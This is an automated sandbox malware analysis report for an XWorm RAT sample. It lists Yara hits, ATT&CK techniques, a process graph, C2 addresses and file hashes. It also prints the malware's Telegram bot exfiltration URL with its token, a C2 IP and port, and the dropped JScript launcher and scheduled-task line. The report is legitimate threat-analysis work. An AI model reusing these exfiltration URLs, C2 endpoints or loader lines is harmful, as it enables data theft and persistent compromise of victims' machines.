                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: ImageSyncProX.scrBinary or memory string: WIN_81
                Source: ImageSyncProX.scrBinary or memory string: WIN_XP
                Source: ImageSyncProX.scrBinary or memory string: WIN_XPe
                Source: ImageSyncProX.scrBinary or memory string: WIN_VISTA
                Source: ImageSyncProX.scrBinary or memory string: WIN_7
                Source: ImageSyncProX.scrBinary or memory string: WIN_8
                Source: Dump.pif.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00EB696E
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EB6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00EB6E32
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_0036696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_0036696E
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: 18_2_00366E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00366E32
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                111
                Windows Management Instrumentation
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                121
                Input Capture
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol121
                Input Capture
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                2
                Valid Accounts
                2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Scheduled Task/Job
                21
                Access Token Manipulation
                2
                Software Packing
                NTDS28
                System Information Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job
                111
                Masquerading
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture13
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1544503
                Sample: DA92phBHUS.exe
                Start date: 29/10/2024
                Architecture: WINDOWS
                Score: 100

                Graph nodes and edges (flattened to text):
                api.telegram.org 2->53
                nAtuEYczbaU.nAtuEYczbaU 2->55
                206.23.85.13.in-addr.arpa 2->57
                Suricata IDS alerts for network traffic 2->71
                Found malware configuration 2->73
                Malicious sample detected (through community Yara rule) 2->75
                17 other signatures 2->79
                DA92phBHUS.exe 18 2->10 started
                wscript.exe 1 2->12 started
                Uses the Telegram API (likely for C&C communication) 53->77
                cmd.exe 3 10->15 started
                Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->87
                ImageSyncProX.scr 12->19 started
                C:\Users\user\AppData\Local\Temp\...\Dump.pif, PE32 15->51 dropped
                Drops PE files with a suspicious file extension 15->63
                Uses schtasks.exe or at.exe to add and modify task schedules 15->65
                Dump.pif 5 15->21 started
                cmd.exe 2 15->25 started
                conhost.exe 15->27 started
                7 other processes 15->29
                C:\Users\user\AppData\...\ImageSyncProX.scr, PE32 21->45 dropped
                C:\Users\user\AppData\...\ImageSyncProX.js, ASCII 21->47 dropped
                C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 21->49 dropped
                Drops PE files with a suspicious file extension 21->81
                Writes to foreign memory regions 21->83
                Injects a PE file into a foreign processes 21->85
                RegAsm.exe 15 2 21->31 started
                cmd.exe 1 21->35 started
                schtasks.exe 1 21->37 started
                api.telegram.org 149.154.167.220, 443, 64427 TELEGRAMRU United Kingdom 31->59
                193.41.226.233, 2222, 64431 AVORODE unknown 31->61
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->67
                Protects its processes via BreakOnTermination flag 31->69
                conhost.exe 35->39 started
                schtasks.exe 1 35->41 started
                conhost.exe 37->43 started

                Source | Detection | Scanner | Label | Link
                DA92phBHUS.exe | 18% | ReversingLabs | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | 5% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\438799\Dump.pif | 5% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | 0% | ReversingLabs | |

                No Antivirus matches

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                api.telegram.org | 149.154.167.220 | true | true | | unknown
                nAtuEYczbaU.nAtuEYczbaU | unknown | unknown | true | | unknown
                206.23.85.13.in-addr.arpa | unknown | unknown | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                193.41.226.233 | true | | unknown
                https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://api.telegram | RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                http://www.autoitscript.com/autoit3/J | DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | false | | unknown
                http://nsis.sf.net/NSIS_ErrorError | DA92phBHUS.exe | false | URL Reputation: safe | unknown
                https://api.telegram.org | RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                https://api.telegram.org/bot | Dump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                http://api.telegram.org | RegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                https://www.autoitscript.com/autoit3/ | DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | false | | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952 | RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | true
                193.41.226.233 | unknown | unknown | | 60548 | AVORODE | true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1544503
                                        Start date and time:2024-10-29 14:15:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 3s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:DA92phBHUS.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:649673218a19e8fd278c99d1355949f4.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@35/13@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 106
                                        • Number of non-executed functions: 291
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: DA92phBHUS.exe
Time: 09:16:10, Type: API Interceptor, Description: 1685x Sleep call for process: Dump.pif modified
Time: 09:17:48, Type: API Interceptor, Description: 15x Sleep call for process: RegAsm.exe modified
Time: 13:16:11, Type: Task Scheduler, Description: Run new task: ImageSyncProX path: wscript s>//B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Match: 149.154.167.220
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: https://u.to/Ipn6IA, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: Documentos.exe, Detection: malicious, Threat Name: Snake Keylogger
Associated Sample Name / URL: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, Detection: malicious, Threat Name: CryptOne, Snake Keylogger, VIP Keylogger
Associated Sample Name / URL: rShippingDocuments240384.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger
Associated Sample Name / URL: M2AB8BeHc4.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger
Associated Sample Name / URL: Proforma-Invoice#018879TT0100..doc, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger
Associated Sample Name / URL: swift-copy31072024PDF.html, Detection: malicious, Threat Name: HTMLPhisher
Associated Sample Name / URL: Fedex.exe, Detection: malicious, Threat Name: AgentTesla
Match: api.telegram.org
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: https://u.to/Ipn6IA, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: Documentos.exe, Detection: malicious, Threat Name: Snake Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, Detection: malicious, Threat Name: CryptOne, Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: rShippingDocuments240384.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: M2AB8BeHc4.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: Proforma-Invoice#018879TT0100..doc, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: swift-copy31072024PDF.html, Detection: malicious, Threat Name: HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: Fedex.exe, Detection: malicious, Threat Name: AgentTesla, Context: 149.154.167.220
Match: TELEGRAMRU
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: https://u.to/Ipn6IA, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: ZoomInstaller.exe, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: Documentos.exe, Detection: malicious, Threat Name: Snake Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe, Detection: malicious, Threat Name: CryptOne, Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: rShippingDocuments240384.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: M2AB8BeHc4.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: Proforma-Invoice#018879TT0100..doc, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: swift-copy31072024PDF.html, Detection: malicious, Threat Name: HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: Fedex.exe, Detection: malicious, Threat Name: AgentTesla, Context: 149.154.167.220

Match: AVORODE
Associated Sample Name / URL: nkYzjyrKYK.exe, Detection: malicious, Threat Name: Babadeda, Context: 185.254.97.190
Associated Sample Name / URL: 0vEj9ws1C4.exe, Detection: malicious, Threat Name: Unknown, Context: 185.254.97.190
Associated Sample Name / URL: hzUKkzHBqd.ps1, Detection: malicious, Threat Name: Unknown, Context: 185.254.97.190
Associated Sample Name / URL: 1d686b05f745875e28939abe357baedd169b59f5a0d88.exe, Detection: malicious, Threat Name: Quasar, Context: 193.42.11.9
Associated Sample Name / URL: 8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exe, Detection: malicious, Threat Name: Unknown, Context: 193.42.11.9
Associated Sample Name / URL: 8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exe, Detection: malicious, Threat Name: Unknown, Context: 193.42.11.9
Associated Sample Name / URL: SecuriteInfo.com.Win64.MalwareX-gen.1457.25976.exe, Detection: malicious, Threat Name: Unknown, Context: 185.254.97.173
Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: LummaC, Babuk, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Context: 45.152.46.72
Associated Sample Name / URL: wsr3iUW0I0.exe, Detection: malicious, Threat Name: LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, Context: 45.152.46.72
Associated Sample Name / URL: nL4rzMSCVd.elf, Detection: malicious, Threat Name: Mirai, Context: 185.254.97.237
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL: https://u.to/Ipn6IA, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: Documentos.exe, Detection: malicious, Threat Name: Snake Keylogger, Context: 149.154.167.220
Associated Sample Name / URL: seemybestthingwhichigiventouformakebestappinesswogiven.hta, Detection: malicious, Threat Name: Cobalt Strike, Context: 149.154.167.220
Associated Sample Name / URL: greatevenevermadeforrgreatthignstogetinbacketothegreat.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: bestintercomthingswhichgivebestthingstogetmeback.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: goodthingsbestviewtoseethebetterthingswithmygirlfriend.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: DividasAtivas_tgj.vbs, Detection: malicious, Threat Name: Unknown, Context: 149.154.167.220
Associated Sample Name / URL: greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Associated Sample Name / URL: goodthingstoapprovethebestwaytounderstandhowmuchgood.hta, Detection: malicious, Threat Name: Cobalt Strike, HTMLPhisher, Context: 149.154.167.220
Match: C:\Users\user\AppData\Local\Temp\438799\Dump.pif
Associated Sample Name / URL: Okfjk1hs4kdhs2.exe, Detection: malicious, Threat Name: LummaC
Associated Sample Name / URL: 1XZFfxyWZA.exe, Detection: malicious, Threat Name: RedLine
Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar
Associated Sample Name / URL: ZnPyVAOUBc.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer, Stealc
Associated Sample Name / URL: 1WDpq6mvnr.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: 1WDpq6mvnr.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Threat Name: Unknown

Match: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
Associated Sample Name / URL: Okfjk1hs4kdhs2.exe, Detection: malicious, Threat Name: LummaC
Associated Sample Name / URL: 1XZFfxyWZA.exe, Detection: malicious, Threat Name: RedLine
Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar
Associated Sample Name / URL: ZnPyVAOUBc.exe, Detection: malicious, Threat Name: LummaC, Amadey, LummaC Stealer, Stealc
Associated Sample Name / URL: 1WDpq6mvnr.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: 1WDpq6mvnr.exe, Detection: malicious, Threat Name: Unknown
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
Associated Sample Name / URL: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Threat Name: Unknown
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196
                                                                                                    Entropy (8bit):4.744509327530189
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:RiJBJHonwWDKaJkDDeVD1rjCywWDKaJkDDeVDd:YJ7QjWa5DtHWa5Dd
                                                                                                    MD5:909BB34BD1F7DB01AD95213F28823AF9
                                                                                                    SHA1:255C50CD7EBAC9746763C0A520579B5B9C595CAF
                                                                                                    SHA-256:CB1F67302E3A886C557B7922C2B3051D6031964D671B70B504AC6B145D20B826
                                                                                                    SHA-512:5DEF0EF8D15DAEEFEB3B3FEEA8B2E1EF18CC6C54D118155ADA3AF3FFFBE032E2572DAB5F67CE4C48B9AC1B2FDADC5D0C4F2AE998E37D025A3A14579FF93F8025
                                                                                                    Malicious:true
                                                                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ImageSyncPro Innovations Co\\ImageSyncProX.scr\" \"C:\\Users\\user\\AppData\\Local\\ImageSyncPro Innovations Co\\m\"")
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):893608
                                                                                                    Entropy (8bit):6.62028134425878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Joe Sandbox View:
• Filename: Okfjk1hs4kdhs2.exe, Detection: malicious
• Filename: 1XZFfxyWZA.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: ZnPyVAOUBc.exe, Detection: malicious
• Filename: 1WDpq6mvnr.exe, Detection: malicious
• Filename: 1WDpq6mvnr.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):224434
                                                                                                    Entropy (8bit):7.999153286358092
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t3+D+6cImItj8aknXlll/tzfZHLc5E7D7qlqPYmzgAsVwVZhPlDxad4pE31eG5zf:IDhmlakFxqi7D7lgr6VZJJ/E1vr3z
                                                                                                    MD5:7C55F7CB1AF93F36A36462DAEB277E12
                                                                                                    SHA1:7997EC97A93B98E63B4297CCE8536AA5ACC4391F
                                                                                                    SHA-256:8A787B23BD5BEF3D04590F9B0FE65B2D8DD68B1239A8BF64B3B4F4F6A2ED0633
                                                                                                    SHA-512:482F6AA7D330F3B1647743C13792FEACA175A1A5DD5959241412F9EB89251FAAE5D4821591EC44B81E96565CE50A63ECEC91E35CC34AAB158EF09F05F6FABC01
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):893608
                                                                                                    Entropy (8bit):6.62028134425878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                    Malicious:true
                                                                                                    Antivirus:
